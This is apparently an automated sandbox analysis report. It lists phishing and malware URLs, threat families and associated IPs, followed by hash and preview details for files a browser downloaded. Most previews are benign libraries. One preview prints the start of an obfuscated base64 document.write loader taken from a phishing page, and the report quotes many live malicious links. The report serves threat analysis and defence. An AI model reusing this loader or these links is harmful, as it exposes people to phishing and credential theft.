                                                                                https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                                                                • 151.101.2.137
                                                                                http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                • 151.101.66.137
                                                                                https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.66.137
                                                                                https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                http://klasstackle.com/lfL15Q57vu4UGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.2.137
                                                                                https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-LwGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.130.137
                                                                                https://42yr.rescindq.com/wqtyZAFZzF3hXgsogboKg/Get hashmaliciousTycoon2FABrowse
                                                                                • 151.101.130.137
                                                                                bg.microsoft.map.fastly.nethttp://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                62-3590.pdfGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                ZAMOWIEN.EXE.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 199.232.210.172
                                                                                7ffbfc130000.conhost2.dll.dllGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                https://sportmansguilde.com/?https://www.office.comGet hashmaliciousUnknownBrowse
                                                                                • 199.232.210.172
                                                                                Axactor Microsoft - Introduksjonsm#U00f8te.msgGet hashmaliciousEvilProxyBrowse
                                                                                • 199.232.214.172
                                                                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 199.232.214.172
                                                                                https://cnrsys.com/.jhg/#annQ3bttQ3bd0T2vTau5kZR3wh07xdaiiR3whi-5kZankyH05d0TQ3buGet hashmaliciousHTMLPhisherBrowse
                                                                                • 199.232.214.172
                                                                                Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                • 199.232.214.172
                                                                                me-ycpi-cf-www.g06.yahoodns.nethttps://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                • 87.248.119.251
                                                                                https://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                • 87.248.119.251
                                                                                https://currently8220.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                http://loginscrecghjk.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                http://currentlyatt57update.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                http://currently1980.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.252
                                                                                http://currently6600.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                • 172.67.184.196
                                                                                PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 172.67.74.152
                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                • 104.21.16.12
                                                                                https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                                • 172.67.155.97
                                                                                https://546546546.pages.dev/qweqr?msharing=service@jpplus.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 172.66.47.133
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                FASTLYUSyakov.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 151.101.153.68
                                                                                https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                                • 151.101.66.137
                                                                                http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                http://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                • 185.199.110.133
                                                                                Product_Requirements.Doc.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.129.229
                                                                                SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                • 185.199.108.133
                                                                                Axactor Microsoft - Introduksjonsm#U00f8te.msgGet hashmaliciousEvilProxyBrowse
                                                                                • 199.232.214.172
                                                                                563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                • 151.101.1.108
                                                                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.108.133
                                                                                CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                • 172.67.184.196
                                                                                PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 172.67.74.152
                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                • 104.21.16.12
                                                                                https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                                • 172.67.155.97
                                                                                https://546546546.pages.dev/qweqr?msharing=service@jpplus.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 172.66.47.133
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                YAHOO-DEBDEhttps://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.252
                                                                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                https://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                https://kevinbeilgard.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                https://elderly-same-archeology.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                https://currently8220.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.252
                                                                                https://gyxgxuu.wixsite.com/junoGet hashmaliciousUnknownBrowse
                                                                                • 87.248.119.252
                                                                                https://goodnessmail.wixsite.com/my-site-1Get hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.251
                                                                                http://yhusbssgsuh.wixsite.com/my-siteGet hashmaliciousHTMLPhisherBrowse
                                                                                • 87.248.119.252
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                New_Statement-8723107.jsGet hashmaliciousUnknownBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                New_Statement-8723107.jsGet hashmaliciousUnknownBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 13.85.23.86
                                                                                • 184.28.90.27
                                                                                No context
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):48316
                                                                                Entropy (8bit):5.6346993394709
                                                                                Encrypted:false
                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 71 x 22, 8-bit/color RGB, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):61
                                                                                Entropy (8bit):3.8725127475032446
                                                                                Encrypted:false
                                                                                SSDEEP:3:yionv//thPl2Rtoz/lCyxl/k4E08up:6v/lhPo0Tgy7Tp
                                                                                MD5:4B9D0B0DD2DE57F6DBFADD99B07997DB
                                                                                SHA1:9FEA6EAA1A4EC891DBC5352D0EE4BA75943E71C3
                                                                                SHA-256:DD3BDB2B9505283DC9E0CF7AC2F98DED4F8BFF66C7CEA4C8DCAEDAED938E0362
                                                                                SHA-512:825EEA2199F518DE17306C9A7978D85CED8A27A8CE0D1E78F24D6E2E78551607A2F38199530C78212C27B1A66CB2FA64ED9204B1D60A2F1247BFDA908C919028
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:.PNG........IHDR...G.................IDAT.....$.....IEND.B`.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):61
                                                                                Entropy (8bit):3.990210155325004
                                                                                Encrypted:false
                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                Category:dropped
                                                                                Size (bytes):89501
                                                                                Entropy (8bit):5.289893677458563
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                Category:downloaded
                                                                                Size (bytes):89476
                                                                                Entropy (8bit):5.2896589255084425
                                                                                Encrypted:false
                                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                Malicious:false
                                                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                Category:dropped
                                                                                Size (bytes):47262
                                                                                Entropy (8bit):5.3974731018213795
                                                                                Encrypted:false
                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                Malicious:false
                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):48316
                                                                                Entropy (8bit):5.6346993394709
                                                                                Encrypted:false
                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                Malicious:false
                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text, with very long lines (6577), with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):17716
                                                                                Entropy (8bit):5.892343948187013
                                                                                Encrypted:false
                                                                                SSDEEP:384:8wpGzZoX+DVvugaFMlYGwpGzZoX+DVvugaFMlblr1lr7:jk2go2qk2go2blr1lr7
                                                                                MD5:DE410638ECD4E32FD0B75F3AC87665B8
                                                                                SHA1:0B6ECDA155ACAC8EE1E41D0E5CD1C5AE48CD00F1
                                                                                SHA-256:8DE1DF09C91AE48DD87B84016DC5D6CFFA3E1622B702EF58BA535C178B4D64AC
                                                                                SHA-512:07F3E5B3B93D818C769D6116441425285A51D652AA449FACAC5AD53F8E63E4210C8089904C30640CA4388F769FB9ECCEF25F73E0F4CE8FEE43F8E48BE1E1201E
                                                                                Malicious:false
                                                                                URL:https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/
                                                                                Preview:<script>..if("https://I8fgji.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5TdWNjZXNzIGlzIGdldHRpbmcgd2hhdCB5b3Ugd2FudCwgaGFwcGluZXNzIGlzIHdhbnRpbmcgd2hhdCB5b3UgZ2V0LjwvZGl2PiAtLT4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy42LjAubWluLmpzIj48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jaGFsbGVuZ2VzLmNsb3VkZmxhcmUuY29tL3R1cm5zdGlsZS92MC9hcGkuanM/cmVuZGVyPWV4cGxpY2l0Ij48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvY3J5cHRvLWpzLzQuMS4xL2NyeXB0by1qcy5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+DQogICAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4NCiAgICA8c3R5bGU+DQpib2R5IHsNC
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):48316
                                                                                Entropy (8bit):5.6346993394709
                                                                                Encrypted:false
                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                Malicious:false
                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 71 x 22, 8-bit/color RGB, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):61
                                                                                Entropy (8bit):3.8725127475032446
                                                                                Encrypted:false
                                                                                SSDEEP:3:yionv//thPl2Rtoz/lCyxl/k4E08up:6v/lhPo0Tgy7Tp
                                                                                MD5:4B9D0B0DD2DE57F6DBFADD99B07997DB
                                                                                SHA1:9FEA6EAA1A4EC891DBC5352D0EE4BA75943E71C3
                                                                                SHA-256:DD3BDB2B9505283DC9E0CF7AC2F98DED4F8BFF66C7CEA4C8DCAEDAED938E0362
                                                                                SHA-512:825EEA2199F518DE17306C9A7978D85CED8A27A8CE0D1E78F24D6E2E78551607A2F38199530C78212C27B1A66CB2FA64ED9204B1D60A2F1247BFDA908C919028
                                                                                Malicious:false
                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTL
                                                                                Preview:.PNG........IHDR...G.................IDAT.....$.....IEND.B`.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text
                                                                                Category:downloaded
                                                                                Size (bytes):538
                                                                                Entropy (8bit):5.241685785712188
                                                                                Encrypted:false
                                                                                SSDEEP:12:hYzx7BqhCf7uQ7ctQtqqJmrLgF/7ud++4Nbx8oA2/7uR7ul:hYzxBqhCf7n42RVx+4NBA2/7e7C
                                                                                MD5:6CF8CAE8FB9968112AEE5A81DAD1CB98
                                                                                SHA1:DE3C0D2E2BA43563FFA79FA331EAF5C0A8566A27
